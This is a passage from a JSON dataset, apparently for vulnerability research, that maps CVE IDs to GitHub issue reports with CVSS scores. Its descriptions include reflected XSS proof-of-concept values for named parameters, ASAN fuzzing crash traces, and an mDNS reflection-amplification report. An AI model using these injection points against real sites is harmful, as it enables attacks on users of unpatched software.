NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG FILETAG NUMBERTAG a3 in parse_bin_node PATHTAG NUMBERTAG a3 in parse_bin_node_at_index PATHTAG NUMBERTAG in parse_dict_node PATHTAG NUMBERTAG in parse_bin_node PATHTAG NUMBERTAG in parse_bin_node_at_index PATHTAG NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG b5fd6a NUMBERTAG PATHTAG NUMBERTAG af NUMBERTAG in _start ( PATHTAG ) FILETAG",
  13061. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
  13062. "severity": "MEDIUM",
  13063. "baseScore": 5.0,
  13064. "impactScore": 3.6,
  13065. "exploitabilityScore": 1.3
  13066. },
  13067. {
  13068. "CVE_ID": "CVE-2017-6448",
  13069. "Issue_Url_old": "https://github.com/radare/radare2/issues/6885",
  13070. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6885",
  13071. "Repo_new": "radareorg/radare2",
  13072. "Issue_Created_At": "2017-03-02T16:47:42Z",
  13073. "description": "Stack buffer overflow in APITAG Stack buffer overflow in APITAG Tested on Git HEAD NUMBERTAG e NUMBERTAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG More context in Valgrind report (I can overwrite return address! please consider using stack canaries, because are disabled by default). ERRORTAG",
  13074. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  13075. "severity": "HIGH",
  13076. "baseScore": 7.8,
  13077. "impactScore": 5.9,
  13078. "exploitabilityScore": 1.8
  13079. },
  13080. {
  13081. "CVE_ID": "CVE-2017-6478",
  13082. "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/15",
  13083. "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/15",
  13084. "Repo_new": "paintballrefjosh/mangoswebv4",
  13085. "Issue_Created_At": "2017-03-04T05:01:11Z",
  13086. "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \"step\" HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG APITAG < The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ) FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13087. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13088. "severity": "MEDIUM",
  13089. "baseScore": 6.1,
  13090. "impactScore": 2.7,
  13091. "exploitabilityScore": 2.8
  13092. },
  13093. {
  13094. "CVE_ID": "CVE-2017-6479",
  13095. "Issue_Url_old": "https://github.com/FenixHosting/fenix-open-source/issues/2",
  13096. "Issue_Url_new": "https://github.com/fenixhosting/fenix-open-source/issues/2",
  13097. "Repo_new": "FenixHosting/fenix-open-source",
  13098. "Issue_Created_At": "2017-03-04T14:42:05Z",
  13099. "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \"search by topic\" HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13100. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13101. "severity": "MEDIUM",
  13102. "baseScore": 6.1,
  13103. "impactScore": 2.7,
  13104. "exploitabilityScore": 2.8
  13105. },
  13106. {
  13107. "CVE_ID": "CVE-2017-6480",
  13108. "Issue_Url_old": "https://github.com/groovel/cmsgroovel/issues/2",
  13109. "Issue_Url_new": "https://github.com/groovel/cmsgroovel/issues/2",
  13110. "Repo_new": "groovel/cmsgroovel",
  13111. "Issue_Created_At": "2017-03-04T05:34:46Z",
  13112. "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \u201cpath\u201d HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_REQUEST FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13113. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13114. "severity": "MEDIUM",
  13115. "baseScore": 6.1,
  13116. "impactScore": 2.7,
  13117. "exploitabilityScore": 2.8
  13118. },
  13119. {
  13120. "CVE_ID": "CVE-2017-6481",
  13121. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/992",
  13122. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/992",
  13123. "Repo_new": "phpipam/phpipam",
  13124. "Issue_Created_At": "2017-02-27T18:04:54Z",
  13125. "description": "phpipam (lastest version) Multiple Cross Site Scripting (XSS). Product\uff1aphpipam Download: URLTAG Vunlerable Version: lastest version and probably prior Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered multiple Cross Site Scripting (XSS) in \u201cphpipam\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to several pages. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG Post : instructions = > APITAG alert NUMBERTAG APITAG APITAG APITAG alert NUMBERTAG APITAG < To FILETAG",
  13126. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13127. "severity": "MEDIUM",
  13128. "baseScore": 6.1,
  13129. "impactScore": 2.7,
  13130. "exploitabilityScore": 2.8
  13131. },
  13132. {
  13133. "CVE_ID": "CVE-2017-6483",
  13134. "Issue_Url_old": "https://github.com/atutor/ATutor/issues/129",
  13135. "Issue_Url_new": "https://github.com/atutor/atutor/issues/129",
  13136. "Repo_new": "atutor/atutor",
  13137. "Issue_Created_At": "2017-03-02T17:15:46Z",
  13138. "description": "APITAG \u2013 Multiple Cross Site Scripting (XSS). Product: APITAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in the \u201clang_code\u201d HTTP GET parameter passed to PATHTAG PATHTAG and PATHTAG An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13139. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13140. "severity": "MEDIUM",
  13141. "baseScore": 6.1,
  13142. "impactScore": 2.7,
  13143. "exploitabilityScore": 2.8
  13144. },
  13145. {
  13146. "CVE_ID": "CVE-2017-6484",
  13147. "Issue_Url_old": "https://github.com/INTER-Mediator/INTER-Mediator/issues/772",
  13148. "Issue_Url_new": "https://github.com/inter-mediator/inter-mediator/issues/772",
  13149. "Repo_new": "inter-mediator/inter-mediator",
  13150. "Issue_Created_At": "2017-03-03T12:55:16Z",
  13151. "description": "INTER Mediator \u2013 Multiple Cross Site Scripting (XSS) . Product: INTER Mediator Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cINTER Mediator NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in the \u201cc\u201d HTTP POST parameter and in the \u201ccred\u201d HTTP POST parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG POST parameter : cred Value : \" /> APITAG alert NUMBERTAG APITAG < To: FILETAG NUMBERTAG URLTAG",
  13152. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13153. "severity": "MEDIUM",
  13154. "baseScore": 6.1,
  13155. "impactScore": 2.7,
  13156. "exploitabilityScore": 2.8
  13157. },
  13158. {
  13159. "CVE_ID": "CVE-2017-6485",
  13160. "Issue_Url_old": "https://github.com/jasonjoh/php-calendar/issues/4",
  13161. "Issue_Url_new": "https://github.com/jasonjoh/php-calendar/issues/4",
  13162. "Repo_new": "jasonjoh/php-calendar",
  13163. "Issue_Created_At": "2017-03-03T16:54:12Z",
  13164. "description": "php calendar \u2013 Cross Site Scripting (XSS) . Product: php calendar Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201cphp calendar latest version\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the APITAG HTTP GET parameter passed to the \u201cphp calendar APITAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13165. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13166. "severity": "MEDIUM",
  13167. "baseScore": 6.1,
  13168. "impactScore": 2.7,
  13169. "exploitabilityScore": 2.8
  13170. },
  13171. {
  13172. "CVE_ID": "CVE-2017-6486",
  13173. "Issue_Url_old": "https://github.com/reasoncms/reasoncms/issues/264",
  13174. "Issue_Url_new": "https://github.com/reasoncms/reasoncms/issues/264",
  13175. "Repo_new": "reasoncms/reasoncms",
  13176. "Issue_Created_At": "2017-03-02T17:00:54Z",
  13177. "description": "reasoncms \u2013 Cross Site Scripting (XSS). Product: reasoncms Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201creasoncms NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the APITAG HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13178. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13179. "severity": "MEDIUM",
  13180. "baseScore": 6.1,
  13181. "impactScore": 2.7,
  13182. "exploitabilityScore": 2.8
  13183. },
  13184. {
  13185. "CVE_ID": "CVE-2017-6487",
  13186. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/165",
  13187. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/165",
  13188. "Repo_new": "Telaxus/EPESI",
  13189. "Issue_Created_At": "2017-03-02T18:16:08Z",
  13190. "description": "EPESI \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: EPESI Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cEPESI NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc: Multiple POST parameters : state, element, id, tab, cid Value : > APITAG alert NUMBERTAG APITAG < To: FILETAG FILETAG",
  13191. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13192. "severity": "MEDIUM",
  13193. "baseScore": 6.1,
  13194. "impactScore": 2.7,
  13195. "exploitabilityScore": 2.8
  13196. },
  13197. {
  13198. "CVE_ID": "CVE-2017-6488",
  13199. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/166",
  13200. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/166",
  13201. "Repo_new": "Telaxus/EPESI",
  13202. "Issue_Created_At": "2017-03-02T18:17:34Z",
  13203. "description": "EPESI \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: EPESI Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cEPESI NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc: Multiple POST parameters : visible, tab, cid Value : > APITAG alert NUMBERTAG APITAG < To: FILETAG FILETAG",
  13204. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13205. "severity": "MEDIUM",
  13206. "baseScore": 6.1,
  13207. "impactScore": 2.7,
  13208. "exploitabilityScore": 2.8
  13209. },
  13210. {
  13211. "CVE_ID": "CVE-2017-6489",
  13212. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/169",
  13213. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/169",
  13214. "Repo_new": "Telaxus/EPESI",
  13215. "Issue_Created_At": "2017-03-02T18:21:19Z",
  13216. "description": "EPESI \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: EPESI Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cEPESI NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc: Multiple POST parameters : element, state, cat, id, cid Value : > APITAG alert NUMBERTAG APITAG < To: FILETAG FILETAG",
  13217. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13218. "severity": "MEDIUM",
  13219. "baseScore": 6.1,
  13220. "impactScore": 2.7,
  13221. "exploitabilityScore": 2.8
  13222. },
  13223. {
  13224. "CVE_ID": "CVE-2017-6491",
  13225. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/168",
  13226. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/168",
  13227. "Repo_new": "Telaxus/EPESI",
  13228. "Issue_Created_At": "2017-03-02T18:20:04Z",
  13229. "description": "EPESI \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: EPESI Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cEPESI NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc: Multiple POST parameters : tooltip_id,callback,args, cid Value : > APITAG alert NUMBERTAG APITAG < To: FILETAG FILETAG",
  13230. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13231. "severity": "MEDIUM",
  13232. "baseScore": 6.1,
  13233. "impactScore": 2.7,
  13234. "exploitabilityScore": 2.8
  13235. },
  13236. {
  13237. "CVE_ID": "CVE-2017-6500",
  13238. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/376",
  13239. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/376",
  13240. "Repo_new": "imagemagick/imagemagick",
  13241. "Issue_Created_At": "2017-02-08T15:32:18Z",
  13242. "description": "out of bounds read in APITAG This bug was found while fuzzing APITAG with afl fuzz Tested on APITAG git commit APITAG Command: magick bug2 /dev/null FILETAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG eb2 at pc NUMBERTAG d NUMBERTAG bp NUMBERTAG bfe4d NUMBERTAG sp NUMBERTAG bfe4d NUMBERTAG c READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG eb2 thread T NUMBERTAG d NUMBERTAG f in APITAG PATHTAG NUMBERTAG dc8 in APITAG PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG c5b7ae in APITAG PATHTAG NUMBERTAG c5f NUMBERTAG f in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG c9e in APITAG PATHTAG NUMBERTAG b1b7b4 in APITAG PATHTAG NUMBERTAG dfda in APITAG PATHTAG NUMBERTAG dfda in main PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG db7 in _start ( PATHTAG NUMBERTAG b NUMBERTAG eb2 is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG b NUMBERTAG ea NUMBERTAG b NUMBERTAG eb1) allocated by thread T0 here NUMBERTAG e4 in malloc ( PATHTAG NUMBERTAG aac6e in APITAG PATHTAG NUMBERTAG aac6e in APITAG PATHTAG NUMBERTAG dc8 in APITAG PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG c5b7ae in APITAG PATHTAG NUMBERTAG c5f NUMBERTAG f in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG aa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG aa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG aa NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG aa NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG aa NUMBERTAG c0: fa fa fa fa fa fa fa fa fd fd fd fd fa fa fd fd NUMBERTAG aa NUMBERTAG d0: fd fd fa fa NUMBERTAG fa fa fa fd fd fd fd fa fa NUMBERTAG aa NUMBERTAG e0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG aa NUMBERTAG f0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG aa NUMBERTAG fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa NUMBERTAG aa NUMBERTAG fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG aa NUMBERTAG fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING Aborted",
  13243. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13244. "severity": "MEDIUM",
  13245. "baseScore": 5.5,
  13246. "impactScore": 3.6,
  13247. "exploitabilityScore": 1.8
  13248. },
  13249. {
  13250. "CVE_ID": "CVE-2017-6500",
  13251. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/375",
  13252. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/375",
  13253. "Repo_new": "imagemagick/imagemagick",
  13254. "Issue_Created_At": "2017-02-08T15:29:18Z",
  13255. "description": "out of bounds read in APITAG This bug was found while fuzzing APITAG with afl fuzz Tested on APITAG git commit APITAG Command: magick bug1 /dev/null FILETAG READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG thread T NUMBERTAG d NUMBERTAG f in APITAG PATHTAG NUMBERTAG dc8 in APITAG PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG c5b7ae in APITAG PATHTAG NUMBERTAG c5f NUMBERTAG f in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG c9e in APITAG PATHTAG NUMBERTAG b1b7b4 in APITAG PATHTAG NUMBERTAG dfda in APITAG PATHTAG NUMBERTAG dfda in main PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG db7 in _start ( PATHTAG NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG b NUMBERTAG b NUMBERTAG allocated by thread T0 here NUMBERTAG e4 in malloc ( PATHTAG NUMBERTAG aac6e in APITAG PATHTAG NUMBERTAG aac6e in APITAG PATHTAG NUMBERTAG dc8 in APITAG PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG c5b7ae in APITAG PATHTAG NUMBERTAG c5f NUMBERTAG f in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fd fd fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG b NUMBERTAG ea0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG b NUMBERTAG eb0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG b NUMBERTAG ec0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG b NUMBERTAG ed0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING Aborted",
  13256. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13257. "severity": "MEDIUM",
  13258. "baseScore": 5.5,
  13259. "impactScore": 3.6,
  13260. "exploitabilityScore": 1.8
  13261. },
  13262. {
  13263. "CVE_ID": "CVE-2017-6509",
  13264. "Issue_Url_old": "https://github.com/Smith0r/burgundy-cms/issues/36",
  13265. "Issue_Url_new": "https://github.com/smith0r/burgundy-cms/issues/36",
  13266. "Repo_new": "Smith0r/burgundy-cms",
  13267. "Issue_Created_At": "2017-03-05T15:05:17Z",
  13268. "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \"action\" HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13269. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13270. "severity": "MEDIUM",
  13271. "baseScore": 6.1,
  13272. "impactScore": 2.7,
  13273. "exploitabilityScore": 2.8
  13274. },
  13275. {
  13276. "CVE_ID": "CVE-2017-6511",
  13277. "Issue_Url_old": "https://github.com/andrzuk/FineCMS/issues/2",
  13278. "Issue_Url_new": "https://github.com/andrzuk/finecms/issues/2",
  13279. "Repo_new": "andrzuk/finecms",
  13280. "Issue_Created_At": "2017-03-04T15:28:47Z",
  13281. "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \"action\" HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG FILETAG FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13282. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13283. "severity": "MEDIUM",
  13284. "baseScore": 6.1,
  13285. "impactScore": 2.7,
  13286. "exploitabilityScore": 2.8
  13287. },
  13288. {
  13289. "CVE_ID": "CVE-2017-6519",
  13290. "Issue_Url_old": "https://github.com/lathiat/avahi/issues/203",
  13291. "Issue_Url_new": "https://github.com/lathiat/avahi/issues/203",
  13292. "Repo_new": "lathiat/avahi",
  13293. "Issue_Created_At": "2018-11-08T16:06:58Z",
  13294. "description": "Missing link local checks in Avahi makes APITAG with mDNS traffic reflection possible. I tried with Scapy to do a reflection with amplification on mDNS service running Avahi (git master branch and version NUMBERTAG with a good result. This is very similar to issue APITAG observed with SSDP URLTAG : lack of link local checks when processing queries. I sent spoofed datagram to mDNS with: APITAG This was responded by Avahi with amplification from NUMBERTAG to NUMBERTAG bytes and sent to spoofed IP. CODETAG Attaching PCAP file with query and response. Query was sent from same subnet. FILETAG As you see Avahi replied to multicast query and sent reply to Cloudflare's DNS server on NUMBERTAG port. TTL was NUMBERTAG My router decremented that to NUMBERTAG and forwarded packet to WAN, Unicast queries seems to be handled in a similar way. I tested some more devices not running Avahi to have better understanding of the issue. My very old AVR (vulnerable to mDNS reflection on various ports, seems to have no link local checks). Avahi daemon NUMBERTAG also vulnerable, didn't fallback to multicast, nor ignore non link local queries, moreover it responds with unicast to src/dst port NUMBERTAG which seems to violate RFS and cause even more reflections possible). On the other hand Google Chromecast seems to do very strict link local checks and answers mostly with multicast replies. What is very interesting, as it ignores any non link local queries. I was unable to do any reflection with Chromecast. I played also a bit with APITAG mDNS implementation and it seems to ignore all my attempts just as Chromecast do. In my opinion section NUMBERTAG of mDNS RFC NUMBERTAG still applies to Legacy Unicast Responses. Link local checks should be done, and non link local queries discarded. Google Chromecast seems to ignore requirements of s ection NUMBERTAG APITAG Unicast Responses) and sends response to NUMBERTAG port with multicast reply. Could this be fixed just by a strict verification of source address belongs to link local network to make sure remote, rouge queries are ignored? The second part of improvement would be removal of legacy support and force of fallback to multicast to ensure answers are link local too. This however might break backward compatibility as I understand.",
  13295. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  13296. "severity": "CRITICAL",
  13297. "baseScore": 9.1,
  13298. "impactScore": 5.2,
  13299. "exploitabilityScore": 3.9
  13300. },
  13301. {
  13302. "CVE_ID": "CVE-2017-6533",
  13303. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/833",
  13304. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/833",
  13305. "Repo_new": "wpo-foundation/webpagetest",
  13306. "Issue_Created_At": "2017-03-04T07:52:39Z",
